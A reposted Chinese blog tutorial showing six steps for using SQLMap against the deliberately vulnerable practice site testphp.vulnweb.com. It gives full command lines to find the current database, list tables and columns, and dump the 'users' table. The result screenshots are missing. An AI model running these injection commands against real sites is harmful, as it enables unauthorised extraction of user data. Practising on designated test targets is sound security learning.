首页 Web开发 Windows程序 编程语言 数据库 移动开发 系统相关 微信 其他好文

六步骤活用SQLMap(以testphp.vulnweb.com为测试靶机)

时间:2014-08-28 02:09:29   收藏:0   阅读:1390

1、搭建Python 2.7.X 和SQLmap环境;

2、使用web扫描工具(如ZAP等)找到SQL的可能注入点:“http://testphp.vulnweb.com/artists.php?artist=1”;

3、使用sqlmap 获取当前数据库名称

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db

运行结果如下:bubuko.com,布布扣

4、使用sqlmap 列表名

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --table -D  acuart

运行结果如下:

bubuko.com,布布扣

5、使用sqlmap 列字段名称

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T users -D acuart -v 0

运行结果如下:

bubuko.com,布布扣

6、使用sqlmap 获取字段内容

sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T users -D acuart -v 0

运行结果如下:

bubuko.com,布布扣

本文出自 “SOA安全” 博客,请务必保留此出处http://dannyqiu.blog.51cto.com/344039/1545942

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!